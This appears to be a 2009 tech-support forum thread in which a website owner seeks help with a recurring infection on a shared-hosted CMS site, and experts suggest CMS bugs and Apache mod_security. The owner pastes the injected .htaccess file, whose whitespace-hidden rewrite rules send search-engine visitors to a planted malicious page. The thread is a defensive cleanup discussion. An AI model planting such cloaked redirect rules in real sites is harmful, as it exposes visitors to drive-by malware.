?
Solved

Website infected with virus - keeps coming back

Posted on 2009-02-09
15
Medium Priority
?
1,074 Views
Last Modified: 2013-11-22
Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:


www.philcampbellmusic.co.uk

(WARNING virus at time of writing on aboe website which will be brough down in the next few hours and reset - make sure you have anti virus software on your PC before clickling link above)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administrattion for the CMS that allowed us to edit the content and of cours tried changing various passwords.

The website is hosted by fasthosts (linux package - mysql db). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks
0
Comment
Question by:afflik1923
  • 8
  • 4
  • 3
15 Comments
 
LVL 29

Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23590536
HI,
if the website hosted on linux, then i would not say surely that its been affected by virus

it could be , someone upload some script on the server via your cms or your server has been compromized

can you just explain, whats make you thinks its been effected by virus ??

did any one tell you ??

also is this shared hosting or vps hosting??
0
 

Author Comment

by:afflik1923
ID: 23590765
if you visit the website running anti virus software and Internet explorer (say try it with AVG) then you will see what occurs. In fact I have attached a screen shot.

Also if you google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from re-occuring?


ExampleCapture.JPG
0
 
LVL 29

Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23591004
Ok from my pc, i am getting Troj/JSRedir-D for script call .js

if you look at the picture you will see
its taking /admin/inages/check.js as virus

its thinking js script as virus

like one of my webiste, i had a simple javascrpt, and those antivirus would not allow to view that page because of javascript


cleaning virus on the pc would not make any different, and also, there is no virus on the server, its the script you need to check, there is somehing on the script that its not allowed by antivirus

virusscript.GIF
0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 

Author Comment

by:afflik1923
ID: 23591157
It is a script virus but that's the problem. It actually tries to compromise with vistiors PC. Fasthosts even closed us down for not sorting it out for a period of time.
Also the problem at esent does not occur in firefox. Only IE and the flash does not play properly.

0
 
LVL 29

Assisted Solution

by:fosiul01
fosiul01 earned 800 total points
ID: 23591178
its the CMS you are using, I would of say the Bugs in that CMS,

do you have any check.js file in /admin/imagesehi/check.js  file ??
0
 
LVL 15

Expert Comment

by:xmachine
ID: 23591493
Hi,

Can you rename both files and upload them here please ?



A Symantec Certified Specialist @ your service
0
 

Author Comment

by:afflik1923
ID: 23595274
I will upload them ASAP. they are always the files that get changed and they are full of someone else's code.

Unfortunltaty the original creators of the website have washed their hands of the website a bit which is frustrating.

Thanks.
0
 

Author Comment

by:afflik1923
ID: 23596660
I'm stugling to upload the two infected files right now. But please find the contents of the .htaccess file (in code box)
It uses  a lot of empty space so when you first open it it looks like an empty.

Also I now have written instructions on how I fix the problem. But it is always not long before it comes back. The guide is:

1) Deleted the ehi folder in
/htdocs/admin/images/

2) Replaced the two files
flashEmbed.js
pageSwitch.js
With non infected versions.

3) Open for editing and deleted all the content in the .htaccess file in the root folder.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever in?




      # a0b4df006e02184c60dbf503e71c87ad                                                                                                                                                      
                                                                                                                                                      RewriteEngine On                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                      
                                                                                                                                                      RewriteCond %{TIME_SEC} <59                                                                                                                                                      
                                                                                                                                                      RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]                                                                                                                                                      
                                                                                                                                                      # a995d2cc661fa72452472e9554b5520c                               

Open in new window

0
 

Author Comment

by:afflik1923
ID: 23649524
So any ideas on this? At present virus not present as cleaned it up again but I know sooner or later it will rear its head again. Be nice to close whatever hole is open.

Thanks
0
 
LVL 15

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23649888
0
 
LVL 15

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23649911
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service
0
 

Author Comment

by:afflik1923
ID: 23649977
I will check out some of these links but also add that don't forget I'm using a shared host so I doubt I would be able to make changes to the Apache installaion?
Do you think the webhost themselves (Fasthost) play some part in the weak security?
0
 
LVL 15

Assisted Solution

by:xmachine
xmachine earned 1000 total points
ID: 23650103
Hi,

Yes, you should ask them on how to add/enable mod_security for apache. Otherwise, change the hosting provider. If they can't protect, it's the time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service
0
 

Accepted Solution

by:
afflik1923 earned 0 total points
ID: 23794398
Still ok since fixing last attack but I'm sure an attack is imminent. I will close this tad for now however.

Thanks
0
 

Author Comment

by:afflik1923
ID: 23794441
note I thought I had still awarded points for this question but if this has not happened let me know. but I beleive I have awarded points and acceptedown summary answer.

Thanks
0

Featured Post

Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as the high-speed power of the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Although a lot of people devote their energy toward marketing for specific industries, there are some basic principles that can be applied to any sector imaginable. We’ll look at four steps to take and examine how those steps were put into action fo…
CTAs encourage people to do something specific to show interest in your company, product or service. Keep reading to learn why CTAs should always be thought of as extremely important, albeit small, sections of websites.
This tutorial walks through the best practices in adding a local business to Google Maps including how to properly search for duplicates, marker placement, and inputing business details. Login to your Google Account, then search for "Google Mapmaker…
This video teaches users how to migrate an existing Wordpress website to a new domain.
Suggested Courses

839 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question